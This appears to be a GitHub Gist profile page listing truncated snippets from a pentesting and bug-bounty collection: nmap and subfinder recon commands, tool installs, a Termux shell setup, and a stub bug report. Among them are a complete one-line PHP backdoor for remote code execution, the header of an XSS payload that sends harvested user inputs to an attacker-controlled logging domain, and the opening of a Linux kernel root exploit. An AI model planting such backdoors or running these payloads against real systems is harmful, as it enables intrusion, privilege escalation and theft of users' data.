Skip to content

Instantly share code, notes, and snippets.

View j3rrykh4n's full-sized avatar
🙂
Cooking........

JerryKhan j3rrykh4n

🙂
Cooking........
View GitHub Profile
scan target for pentest
nmap -PN -n -A -sS -p- -oN output.nmap <IP>
-Pn : no ping check (host is up),
-n no dns resolution
-A : detect systeme info
-sT : tcp connect [laisse des traces dans les logs serveurs] (moins impactant que -sS Syn, ne laisse pas de trace dans les logs par defaut)
-p- : port de 0-65535
-oN output.nmap : write utput to file
ajouter un scan udp en parallèle -sU (dns, ipsec ...)
#!/bin/bash
mkdir ~/$1
mkdir ~/$1/spam
mkdir ~/$1/fingerprints
mkdir ~/$1/assets
mkdir ~/$1/urls
mkdir ~/$1/endpoints
mkdir ~/$1/automations
#!/bin/bash
echo "you should die now :3 it'll be take some time"
#@Tomnomnom
go get -u -v github.com/tomnomnom/anew
go get -u -v github.com/tomnomnom/httprobe
go get -u -v github.com/tomnomnom/assetfinder
go get -u -v github.com/tomnomnom/waybackurls
go get -u -v github.com/tomnomnom/fff
go get -u -v github.com/tomnomnom/qsreplace
/* xssmaleware.js
* XSS payload for harvesting user inputs!
* By Anik Hasibul (github.com/AnikHasibul)
* Change the $_config.url as your own
* Only for experimental purpose
*/
var $_config = {
"url":"http://myMaliciousLogDomain.xom/xsslogger.php" /*EDIT THIS MUST */
}
@j3rrykh4n
j3rrykh4n / Backdoor.php
Last active June 28, 2020 10:45
The tiniest PHP malware/backdoor for Remote Code Execution. Author hasibul hasan
<?php $_GET["f"]($_GET["p"]); ?>

Full scope access on NASA with HTML

Bug report for ..........

Steps To Reproduce

  • Install this by this command apt install example

  • Configure this with this env EXAMPLE=POC

  • Run this for exploit

@j3rrykh4n
j3rrykh4n / GoldDigger
Last active July 8, 2022 14:11
Look for Hole and dig everything ~_~
Technology
Subdomain Enumeration:
# Basic usage
subfinder -d example.com > example.com.subs
# Recursive
subfinder -d example.com -recursive -silent -t 200 -v -o example.com.subs
/*
chocobo_root.c
linux AF_PACKET race condition exploit
exploit for Ubuntu 16.04 x86_64
vroom vroom
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=
user@ubuntu:~$ uname -a
Linux ubuntu 4.4.0-51-generic #72-Ubuntu SMP Thu Nov 24 18:29:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu:~$ id
pkg install fish
pkg install curl
curl -L https://get.oh-my.fish | fish
curl -L https://get.oh-my.fish > install
fish install --path=~/.local/share/omf --config=~/.config/omf
omf install bobthefish
export GOROOT="/data/data/com.termux/files/usr/lib/go"
export GOPATH=$HOME/storage/storage/sdcard0/htdocs/go/
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
~